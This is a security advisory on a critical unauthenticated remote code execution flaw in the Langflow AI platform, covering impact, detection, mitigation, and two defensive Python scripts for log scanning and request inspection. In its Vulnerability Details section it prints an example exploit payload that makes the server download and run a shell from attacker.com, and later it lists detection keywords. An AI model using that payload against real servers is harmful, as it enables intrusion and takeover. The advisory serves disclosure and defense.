Critical Unauthenticated RCE Flaw (CVE-2026-33017) in Langflow AI Platform Actively Exploited

Critical Unauthenticated RCE Vulnerability Reported in Langflow AI Platform

CRITICAL
February 26, 2026
Vulnerability, Cyberattack, Malware

Related Entities
Products & Tech: Langflow
Other: Aviral Srivastava

CVE Identifiers
CVE-2026-33017 (CRITICAL, CVSS: 9.3)

Executive Summary

A critical unauthenticated remote code execution (RCE) vulnerability, CVE-2026-33017, has been discovered in Langflow, a popular open-source user interface for building AI applications. The flaw, reported by researcher Aviral Srivastava on February 26, 2026, allows a remote attacker to execute arbitrary Python code on a server running a vulnerable version of Langflow without any authentication. The vulnerability stems from an insecure use of the exec() function in a public API endpoint. Due to its simplicity and high impact, attackers were able to create and deploy exploits within 20 hours of the public disclosure, leading to active exploitation in the wild. This incident underscores the growing security risks associated with the rapid adoption of AI development tools and infrastructure.


Vulnerability Details

The vulnerability resides in the POST /api/v1/build_public_tmp/{flow_id}/flow API endpoint. This endpoint is designed to allow the building of public flows without authentication. However, it improperly trusts user-supplied input.

An attacker can send a crafted HTTP request to this endpoint containing a malicious flow definition within the data parameter. This data, which includes Python code, is passed directly to a server-side exec() function without proper sanitization or sandboxing. This allows the attacker to execute any Python code they desire with the privileges of the Langflow application.

Example Malicious Payload (Conceptual):

{
  "data": {
    "nodes": [
      {
        "data": {
          "node": {
            "template": {
              "code": {
                "value": "import os; os.system('wget http://attacker.com/shell -O /tmp/shell; chmod +x /tmp/shell; /tmp/shell')"
              }
            }
          }
        }
      }
    ]
  }
}

Affected Systems

  • Langflow versions prior to and including 1.8.1 are reportedly affected.

The Langflow development team has addressed the issue in a subsequent development version. Users are urged to upgrade to the latest version as soon as it becomes available and to restrict access to their Langflow instances in the interim.


Exploitation Status

The vulnerability is under active exploitation. Security researchers observed that exploits were developed and deployed by attackers, including botnets, less than a day after the researcher's public disclosure. This rapid weaponization is typical for critical, easy-to-exploit RCEs. This vulnerability is distinct from a previous Langflow RCE, CVE-2025-3248, but shares a similar root cause of unsanitized input being passed to a dangerous function.


Impact Assessment

Successful exploitation of CVE-2026-33017 grants an attacker full control over the underlying server, leading to severe consequences:

  • Data Exfiltration: Attackers can steal sensitive data stored on the server, including AI models, training data, API keys, and database credentials.
  • System Compromise: The attacker can install backdoors, crypto miners, or other malware to establish persistence on the compromised system.
  • Lateral Movement: The compromised Langflow server can be used as a pivot point to attack other systems within the internal network.
  • Reputational Damage: A compromise of AI infrastructure can damage an organization's reputation and erode customer trust.

IOCs

No specific public IOCs have been released, but any POST requests to the vulnerable endpoint from unknown sources should be considered highly suspicious.


Detection & Response

  • Web Server Log Analysis: Scrutinize web server and reverse proxy logs for any POST requests to the /api/v1/build_public_tmp/ endpoint. Any such requests from untrusted IP addresses are strong indicators of scanning or exploitation.
  • WAF/IPS Signatures: Deploy web application firewall (WAF) or intrusion prevention system (IPS) rules designed to detect and block attempts to exploit this vulnerability.
  • Endpoint Monitoring: On servers running Langflow, monitor for suspicious child processes being spawned by the Langflow application process, such as shell commands (sh, bash), wget, or curl. This aligns with D3FEND's Process Analysis (D3-PA).
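
The log review described in the first bullet can be scripted. The following is an added example, not part of the original report or of Langflow: it scans access-log lines in the common/combined format for POST requests to /api/v1/build_public_tmp/ from clients outside a trusted range. The trusted networks and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import re

# Assumption: internal ranges allowed to reach Langflow; replace with your own.
TRUSTED_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16")]
ENDPOINT_PREFIX = "/api/v1/build_public_tmp/"

# Common/combined access log format: client IP first, request line in quotes.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def is_trusted(ip_text):
    """True only for a parsable address inside one of TRUSTED_NETS."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False  # an unparsable client address is never trusted
    return any(ip in net for net in TRUSTED_NETS)

def suspicious_hits(lines):
    """Return (ip, timestamp, path, status) for untrusted POSTs to the endpoint."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].startswith(ENDPOINT_PREFIX) and not is_trusted(m["ip"]):
            hits.append((m["ip"], m["ts"], m["path"], int(m["status"])))
    return hits

# Constructed sample lines (documentation IP ranges, placeholder flow id).
SAMPLE_LOG = [
    '10.1.2.3 - - [26/Feb/2026:10:00:01 +0000] "POST /api/v1/build_public_tmp/FLOW-ID-PLACEHOLDER/flow HTTP/1.1" 200 512',
    '203.0.113.7 - - [26/Feb/2026:10:00:05 +0000] "POST /api/v1/build_public_tmp/FLOW-ID-PLACEHOLDER/flow HTTP/1.1" 200 431',
    '203.0.113.7 - - [26/Feb/2026:10:00:06 +0000] "GET / HTTP/1.1" 200 2',
    '198.51.100.9 - - [26/Feb/2026:10:02:11 +0000] "POST /api/v1/build_public_tmp/FLOW-ID-PLACEHOLDER/flow HTTP/1.1" 500 87',
]

if __name__ == "__main__":
    for ip, ts, path, status in suspicious_hits(SAMPLE_LOG):
        print(f"{ts} {ip} POST {path} -> {status}")
```

A hit with a 2xx status means the request was processed and the host should be examined; other statuses are at minimum scanning.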

Mitigation

  1. Upgrade Langflow: The primary mitigation is to upgrade to a patched version of Langflow as soon as it is released by the developers.
  2. Restrict Access: As an immediate and critical compensating control, ensure that Langflow instances are not exposed directly to the internet. Access should be restricted to trusted users and IP addresses via a firewall, VPN, or other access control mechanism. This is a form of D3FEND's Network Isolation (D3-NI).
  3. Disable Public Flows: If not required, disable the functionality for creating public flows to reduce the attack surface.
  4. Application Sandboxing: Run the Langflow application in a container or sandbox with minimal privileges to limit the impact of a potential RCE.

Timeline of Events

  1. February 26, 2026: Security researcher Aviral Srivastava responsibly discloses the RCE vulnerability in Langflow.
  2. February 26, 2026: This article was published.
  3. February 26, 2026: Attackers begin actively exploiting CVE-2026-33017 in the wild, approximately 20 hours after public disclosure.

MITRE ATT&CK Mitigations

Updating to a patched version of Langflow is the most direct way to remediate the vulnerability.

Not exposing the Langflow instance to the public internet is a critical compensating control that prevents exploitation.

Running the application in a restricted environment can limit the damage an attacker can do even if they achieve RCE.

D3FEND Defensive Countermeasures

The most immediate and effective countermeasure for CVE-2026-33017 is network isolation. Given that this is an unauthenticated RCE on a public-facing endpoint, organizations must ensure their Langflow instances are not accessible from the public internet. Access should be restricted using a firewall or security group to only allow connections from trusted internal IP ranges or through a secure VPN. This single action removes the initial access vector for remote attackers and serves as a critical compensating control until a patch can be applied. For any AI development tool or similar infrastructure, the default security posture should be internal-only unless there is an explicit and well-vetted business need for public exposure.

For organizations that must expose Langflow, deploying a Web Application Firewall (WAF) with specific rules to filter inbound traffic is essential. A WAF rule can be created to inspect POST requests to the /api/v1/build_public_tmp/* endpoint. The rule should look for and block requests where the data parameter contains suspicious Python keywords like import, os.system, subprocess, or eval. While not foolproof against all obfuscation, this signature-based filtering can block known public exploits and basic attack attempts, providing a valuable layer of defense against the active exploitation of CVE-2026-33017.
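
The inspection rule described above, and the WAF/IPS bullet under Detection & Response, can be prototyped as follows. This is an added example, not code from Langflow or from any WAF product: it walks the request body along the path shown in the conceptual payload and parses each code value with Python's ast module instead of matching substrings, and it fails closed on code it cannot parse. The denylists and the sample body are assumptions constructed for illustration.

```python
import ast
import json
# Assumed denylists for this example; tune them to your environment.
RISKY_MODULES = {"os", "subprocess", "socket", "pty", "ctypes", "importlib"}
RISKY_CALLS = {"eval", "exec", "compile", "__import__", "system", "popen"}

def dig(obj, *keys):
    """Follow dict keys; return None as soon as the shape is unexpected."""
    for key in keys:
        if not isinstance(obj, dict):
            return None
        obj = obj.get(key)
    return obj

def findings_for(code):
    """List reasons the code is suspicious; unparsable code fails closed."""
    try:
        tree = ast.parse(code)
    except (SyntaxError, ValueError):
        return ["unparsable code"]
    found = []
    for n in ast.walk(tree):
        mods = []
        if isinstance(n, ast.Import):
            mods = [a.name.split(".")[0] for a in n.names]
        elif isinstance(n, ast.ImportFrom):
            mods = [(n.module or "").split(".")[0]]
        found += [f"import {m}" for m in mods if m in RISKY_MODULES]
        if isinstance(n, ast.Call):
            name = getattr(n.func, "id", None) or getattr(n.func, "attr", None)
            if name in RISKY_CALLS:
                found.append(f"call {name}")
    return found

def inspect_request(raw_body):
    try:
        body = json.loads(raw_body)
    except ValueError:
        return ["invalid JSON"]
    nodes = dig(body, "data", "nodes")
    out = []
    for node in nodes if isinstance(nodes, list) else []:
        code = dig(node, "data", "node", "template", "code", "value")
        if isinstance(code, str):
            out += findings_for(code)
    return out

# Constructed sample body, shaped like the conceptual payload above.
SAMPLE = json.dumps({"data": {"nodes": [{"data": {"node": {"template": {
    "code": {"value": "import os; os.system('echo test')"}}}}}]}})
```

A non-empty result from inspect_request(SAMPLE) is the block decision; an empty list means no denylisted import or call was found, not that the code is safe to execute.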

To contain the impact of a successful RCE, Langflow should be run in a sandboxed or containerized environment with minimal privileges. Using technologies like Docker or gVisor, the application can be isolated from the host operating system and the broader network. The container should have a read-only filesystem where possible, limited network egress capabilities, and run as a non-root user. This means that even if an attacker successfully exploits CVE-2026-33017 and achieves code execution, their actions are confined within the sandbox. They would be unable to easily access sensitive files on the host, install persistent backdoors, or pivot to other systems on the network, thus dramatically reducing the overall impact of the compromise.

Sources & References

Critical Langflow RCE vulnerability exploited within 20 hours
SC Magazine (scmagazine.com) February 26, 2026

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
